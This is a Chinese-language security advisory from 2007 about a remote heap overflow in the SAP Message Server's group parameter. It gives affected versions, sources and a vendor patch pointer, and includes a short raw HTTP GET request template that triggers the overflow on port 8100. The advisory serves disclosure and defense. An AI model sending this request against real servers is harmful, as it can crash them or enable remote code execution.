安全研究
安全漏洞
SAP消息服务器Group参数远程堆溢出漏洞
发布日期:2007-07-05
更新日期:2007-07-06
受影响系统:SAP Message Server
描述:
BUGTRAQ ID:
24765
SAP消息服务器是SAP设备所使用的用于交换数据和内部消息的服务。
SAP消息服务器在处理畸形的GET请求时存在漏洞,远程攻击者可能利用此漏洞控制服务器。
如果远程攻击者向监听在SAP设备TCP 8100端口上的消息服务器发送了畸形的GET请求,并将URL /msgserver/html/group的Group参数指定为498字节,就可能触发堆溢出,导致拒绝服务或以系统权限执行任意指令。
<*来源:Mark Litchfield (
mark@ngssoftware.com)
链接:
http://marc.info/?l=bugtraq&m=118365794615827&w=2
http://secunia.com/advisories/25966/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
GET /msgserver/html/group?group=**498 bytes** HTTP/1.0
Accept: */*
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727)
Host: sapserver:8100
Proxy-Connection: Keep-Alive
建议:
厂商补丁:
SAP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.sap.com/浏览次数:2717
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |